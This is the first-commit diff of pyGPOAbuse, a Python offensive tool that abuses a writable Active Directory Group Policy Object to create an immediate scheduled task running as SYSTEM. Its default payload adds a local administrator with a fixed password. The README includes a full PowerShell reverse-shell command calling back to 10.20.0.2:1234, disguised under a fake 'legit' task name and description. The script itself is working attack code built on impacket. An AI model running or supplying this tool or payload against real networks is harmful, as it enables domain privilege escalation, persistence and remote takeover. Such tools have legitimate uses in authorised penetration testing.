First commit

.gitignore

@@ -0,0 +1,109 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+env/
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+*.egg-info/
+.installed.cfg
+*.egg
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*,cover
+.hypothesis/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# IPython Notebook
+.ipynb_checkpoints
+
+# pyenv
+.python-version
+
+# celery beat schedule file
+celerybeat-schedule
+
+# dotenv
+
+# virtualenv
+.venv/
+venv/
+ENV/
+
+# Spyder project settings
+.spyderproject
+
+# Rope project settings
+.ropeproject
+
+.idea/
+.pytest_cache/
+
+# Confidential
+credentials.*
+
+# Javascript
+node_modules/
+.config.json
+.config.json.backup
+package-lock.json
+
+config.env
+
+# certs
+*.srl
+*.csr
+*.key
+*.pem

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2019 airman604
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,41 @@
+# pyGPOAbuse
+
+## Description
+
+Python **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by[@pkb1s](https://twitter.com/pkb1s)
+
+This tool can be used when a user can modify an existing GPO that applies on one or more computers. It will create an **immediate scheduled task** as **SYSTEM** on the remote computer.
+
+Default behavior adds a local administrator.
+
+![Example](https://github.com/Hackndo/pygpoabuse/raw/master/assets/demo.gif)
+
+## How to use
+
+### Basic usage
+
+Add **john** user to local administrators group (Password: **H4x00r123..**)
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+``` 
+
+### Advanced usage
+
+Reverse shell example
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
+    -powershell \ 
+    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
+    -taskname "Completely Legit Task" \
+    -description "Dis is legit, pliz no delete" \ 
+``` 
+
+
+## Credits
+
+* [@pkb1s](https://twitter.com/pkb1s) for [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)
+* [@airman604](https://twitter.com/airman604) for [schtask_now.py](https://github.com/airman604/schtask_now)
+* [@SkelSec](https://twitter.com/skelsec) for [msldap](https://github.com/skelsec/msldap)
+

pygpoabuse.py

@@ -0,0 +1,120 @@
+"""
+This tool is a partial python implementation of SharpGPOAbuse
+https://github.com/FSecureLABS/SharpGPOAbuse
+All credit goes to @pkb1s for his research, especially regarding gPCMachineExtensionNames
+
+Also thanks to @airman604 for schtask_now.py that was used and modified in this project
+https://github.com/airman604/schtask_now
+"""
+
+import argparse
+import logging
+import sys
+import re
+
+from impacket.smbconnection import SMBConnection
+
+from pygpoabuse import logger
+from pygpoabuse.gpo import GPO
+
+parser = argparse.ArgumentParser(add_help=True, description="Add ScheduledTask to GPO")
+
+parser.add_argument('target', action='store', help='domain/username[:password]')
+parser.add_argument('-gpo-id', action='store', metavar='GPO_ID', help='GPO to update ')
+parser.add_argument('-taskname', action='store', help='Taskname to create. (Default: TASK_<random>)')
+parser.add_argument('-mod-date', action='store', help='Task modification date (Default: 30 days before)')
+parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+parser.add_argument('-description', action='store', help='Task description (Default: Empty)')
+parser.add_argument('-powershell', action='store_true', help='Use Powershell for command execution')
+parser.add_argument('-command', action='store',
+                    help='Command to execute (Default: Add john:H4x00r123.. as local Administrator)')
+parser.add_argument('-f', action='store_true', help='Force add ScheduleTask')
+parser.add_argument('-v', action='count', default=0, help='Verbosity level (-v or -vv)')
+
+if len(sys.argv) == 1:
+    parser.print_help()
+    sys.exit(1)
+
+options = parser.parse_args()
+
+if not options.gpo_id:
+    parser.print_help()
+    sys.exit(1)
+
+# Init the example's logger theme
+logger.init()
+
+if options.v == 1:
+    logging.getLogger().setLevel(logging.INFO)
+elif options.v >= 2:
+    logging.getLogger().setLevel(logging.DEBUG)
+else:
+    logging.getLogger().setLevel(logging.ERROR)
+
+targetParam = options.target + '@'
+domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
+    targetParam).groups('')
+
+# In case the password contains '@'
+if '@' in address:
+    password = password + '@' + address.rpartition('@')[0]
+    address = address.rpartition('@')[2]
+
+if domain == '':
+    logging.critical('Domain should be specified!')
+    sys.exit(1)
+
+if password == '' and username != '' and options.hashes is None:
+    from getpass import getpass
+    password = getpass("Password:")
+elif options.hashes is not None:
+    if ":" not in options.hashes:
+        logging.error("Wrong hash format. Expecting lm:nt")
+        sys.exit(1)
+
+dc_ip = domain
+if password != '':
+    url = 'ldap+ntlm-password://hackn.lab\\{}:{}@10.10.10.1'.format(username, password)
+    lmhash, nthash = "",""
+else:
+    url = 'ldap+ntlm-nt://hackn.lab\\{}:{}@10.10.10.1'.format(username, options.hashes.split(":")[1])
+    lmhash, nthash = options.hashes.split(":")
+
+
+def get_session(address, target_ip="", username="", password="", lmhash="", nthash="", domain=""):
+    try:
+        smb_session = SMBConnection(address, target_ip)
+        smb_session.login(username, password, domain, lmhash, nthash)
+        return smb_session
+    except Exception as e:
+        logging.error("Connection error")
+        return False
+
+try:
+    smb_session = SMBConnection(dc_ip, dc_ip)
+    smb_session.login(username, password, domain, lmhash, nthash)
+except Exception as e:
+    logging.error("SMB connection error", exc_info=True)
+    sys.exit(1)
+
+try:
+    gpo = GPO(smb_session)
+    task_name = gpo.update_scheduled_task(
+        domain=domain,
+        gpo_id=options.gpo_id,
+        name=options.taskname,
+        mod_date=options.mod_date,
+        description=options.description,
+        powershell=options.powershell,
+        command=options.command,
+        force=options.f
+    )
+    if task_name:
+        if gpo.update_versions(url, domain, options.gpo_id):
+            logging.info("Version updated")
+        else:
+            logging.error("Error while updating versions")
+            sys.exit(1)
+        logging.success("ScheduledTask {} created!".format(task_name))
+except Exception as e:
+    logging.error("An error occurred. Use -vv for more details", exc_info=True)